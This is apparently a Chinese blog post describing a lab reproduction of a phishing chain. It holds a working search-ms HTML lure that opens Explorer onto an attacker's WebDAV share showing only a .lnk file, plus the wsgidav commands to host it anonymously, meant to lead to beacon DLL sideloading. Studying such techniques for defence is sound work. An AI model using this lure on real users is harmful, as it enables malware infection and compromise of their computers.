0x00 实验环境
靶场:全新的windows笔记本,kali
0x01 实验前提
(1)学习国外大佬的文章
攻击链: Email --> invoice.pdf --> 包含一个链接 --> search-ms:query=decoy&crumb=location:\\\\127.0.0.1@5000\\dec&displayname=Hello,is it me you\'re looking for? --> invoice.lnk --> beacon.exe -->beacon.dll(2)动手实战
文章一分钟,复现半小时
0x02 实验步骤
(1)根据钓鱼的思路,首先发一封email邮件,这里省去发钓鱼邮件的过程。直接从包含一个链接开始。 如下是老外的示例网站: https://dav.binary-offensive.com/webdav/searchms.html
当我们去访问的时候,页面会要求我们打开资源管理器。先点击取消,右键查看源代码。可以看到这里是通过search-ms:query=test&crumb的方式来打开远程服务器上的文件,并且只会显示test命名的文件。
其实这里的search-ms:query=test&crumb和我们直接使用exploerer.exe打开是差不多的。我们现在点击打开。可以看到他会自动打开资源管理器,里面只会显示一个test命名的文件,其他文件是不会显示的:
(2)那么如果我们自己去搭建一个这样的html页面,然后我们只显示lnk文件其他文件都不显示的话,当目标点击lnk文件的时候会执行我们的白程序,然后去调用我们的黑dll。但是在这之前我们需要去搭建一个WebDav来托管我们的文件,在kali安装以下工具包:
apt-get install python3-wsgidav
WSGI是什么?
WSGI,全称 Web Server Gateway Interface,或者 Python Web Server Gateway Interface ,是为 Python 语言定义的 Web 服务器和 Web 应用程序或框架之间的一种简单而通用的接口。自从 WSGI 被开发出来以后,许多其它语言中也出现了类似接口。
WebDAV 是什么?
WebDAV(Web Dub)是一种技术和功能,可以使用Web服务器进行文件共享和编辑,目前可用于许多租赁服务器计划,还有用户自己设置VPS等方法。
WebDAV类似于当前流行的Google Drive等在线存储服务,云上的多个用户可以相对安全地进行文件共享和编辑。
(3)现在我们还需要去仿照老外的页面去做一个一模一样的页面即可。 如下代码:这里的192.168.31.242是我的kali ip,dec是目录,这里的query参数查询的是以lnk命名文件。
<html> <head> <title>search-ms</title> <script> window.location.href = 'search-ms:query=lnk&crumb=location:\\\\192.168.31.242@5000\\dec&displayname=Hello, is it me you\'re looking for?'; </script> </head> <body> <center> PoC triggering Microsoft's <b>search-ms</b> URI handler to open up Explorer previewing attacker's WebDAV contents.</br> This is to lure victims into opening malicious files which could have led to their computers infection.<br/> </center> </body> </html>
(4)开启服务:在当前路径下开启5000端口。设置认证为匿名认证:
wsgidav --port=5000 --host=0.0.0.0 --root=./ --auth=anonymous
(6)当我们去点击打开的时候。可以看到页面会显示一个1.lnk文件,因为这个文件我们没做任何处理,所以是没有图标的。
0x03 一些思考
(1)以前说上传文件不能getshell的场景,用处都不大,现在发现只是因为自己了解的知识太少了;
(2)有的电脑运行html并不能成功打开资源管理器,这里猜测是因为禁了js,有策略限制;
(3)多学习外国佬的文章,会涨很多姿势。
标签:姿势,Web,search,文件,--,钓鱼,html,lnk From: https://www.cnblogs.com/cute-puli/p/18079143